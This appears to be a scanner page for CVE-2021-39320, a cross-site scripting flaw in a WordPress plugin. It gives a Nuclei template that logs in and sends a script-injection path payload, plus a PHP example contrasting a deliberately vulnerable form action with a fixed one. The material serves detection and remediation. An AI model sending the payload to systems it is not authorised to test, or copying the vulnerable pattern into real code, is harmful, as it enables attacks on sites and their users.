WordPress Under Construction <1.19 - Cross-Site Scripting
ID: CVE-2021-39320
Severity: medium
Author: dhiyaneshDK
Tags: cve2021,cve,wp-plugin,wpscan,wordpress,wp,xss,authenticated,underconstruction_project
Description
WordPress Under Construction plugin before 1.19 contains a cross-site scripting vulnerability. The plugin echoes out the raw value of $GLOBALS['PHP_SELF'] in the ucOptions.php file on certain configurations, including Apache+modPHP.
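To make the bug class concrete, here is an added example (not the plugin's own code) showing why reflecting PHP_SELF into a form action is CWE-79 under Apache+mod_php, and how to build the action without it. The request path value is constructed from the template above; uc_form_action_vulnerable and uc_form_action_fixed are hypothetical names.

```php
<?php
// Added example, not the plugin's code. Under Apache+mod_php, PHP_SELF carries
// the PATH_INFO portion of the request path verbatim, so the GET request in the
// template above yields this value (constructed here for a stand-alone run).
$GLOBALS['PHP_SELF'] = '/wp-admin/admin.php/"><script>alert(document.domain)</script>/';

// Vulnerable pattern (hypothetical reconstruction of the bug class): the
// request-derived path is concatenated into an HTML attribute unescaped, so the
// closing quote and angle bracket in the path terminate the attribute and tag.
function uc_form_action_vulnerable(): string
{
    return '<form method="post" action="' . $GLOBALS['PHP_SELF']
        . '?page=under-construction">';
}

// Hardened: do not reflect the request path at all. Derive the action from a
// fixed admin URL and escape it for the attribute context. Inside WordPress,
// admin_url() plus esc_url() is the idiomatic pair; the fallback keeps this
// file runnable outside WordPress.
function uc_form_action_fixed(): string
{
    $action = function_exists('admin_url')
        ? admin_url('admin.php?page=under-construction')
        : '/wp-admin/admin.php?page=under-construction';
    return '<form method="post" action="'
        . htmlspecialchars($action, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '">';
}

// If request-derived text must appear in an attribute, escaping it for that
// context neutralises the quote and angle brackets the template relies on.
function uc_escape_attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// The first line contains the exact substring the template's body matcher
// looks for; the other two do not.
echo uc_form_action_vulnerable(), PHP_EOL;
echo uc_form_action_fixed(), PHP_EOL;
echo uc_escape_attr($GLOBALS['PHP_SELF']), PHP_EOL;
```

Run with `php example.php` to compare the three lines; the fixed variant also removes the dependency on server configuration, which is why "only on Apache+mod_php" is not a safe mitigation on its own.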
YAML Source
id: CVE-2021-39320

info:
  name: WordPress Under Construction <1.19 - Cross-Site Scripting
  author: dhiyaneshDK
  severity: medium
  description: |
    WordPress Under Construction plugin before 1.19 contains a cross-site scripting vulnerability. The plugin echoes out the raw value of `$GLOBALS['PHP_SELF']` in the ucOptions.php file on certain configurations, including Apache+modPHP.
  impact: |
    The vulnerability allows an attacker to inject malicious scripts into the website, potentially leading to unauthorized access, data theft, or defacement.
  remediation: |
    Update to the latest version of the WordPress Under Construction plugin (1.19 or higher) to fix the XSS vulnerability.
  reference:
    - https://wpscan.com/vulnerability/49ae1df0-d6d2-4cbb-9a9d-bf3599429875
    - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39320
    - https://nvd.nist.gov/vuln/detail/CVE-2021-39320
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-39320
    cwe-id: CWE-79
    epss-score: 0.00228
    epss-percentile: 0.60903
    cpe: cpe:2.3:a:underconstruction_project:underconstruction:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: underconstruction_project
    product: underconstruction
    framework: wordpress
  tags: cve2021,cve,wp-plugin,wpscan,wordpress,wp,xss,authenticated,underconstruction_project

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

      - |
        GET /wp-admin/admin.php/"><script>alert(document.domain)</script>/?page=under-construction HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'action="/wp-admin/admin.php/"><script>alert(document.domain)</script>'
          - 'under-construction'
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4b0a0048304602210088b61cb73c0df28251edd71a57865358688a74636730b320fa839ba3b5f87724022100e644276f30b668eef4da2bcabb70ac57beda14b4b5bf73b167a6b466109b48eb:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect the vulnerability described above with the Nuclei tool: it first logs in through /wp-login.php (the template is tagged authenticated and references the {{username}} and {{password}} variables, which must be supplied on the command line, for example with -var), then requests the plugin's settings page with the path-info payload and reports a match only when the response is an HTML 200 whose body reflects the payload inside the form action attribute.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-39320.yaml"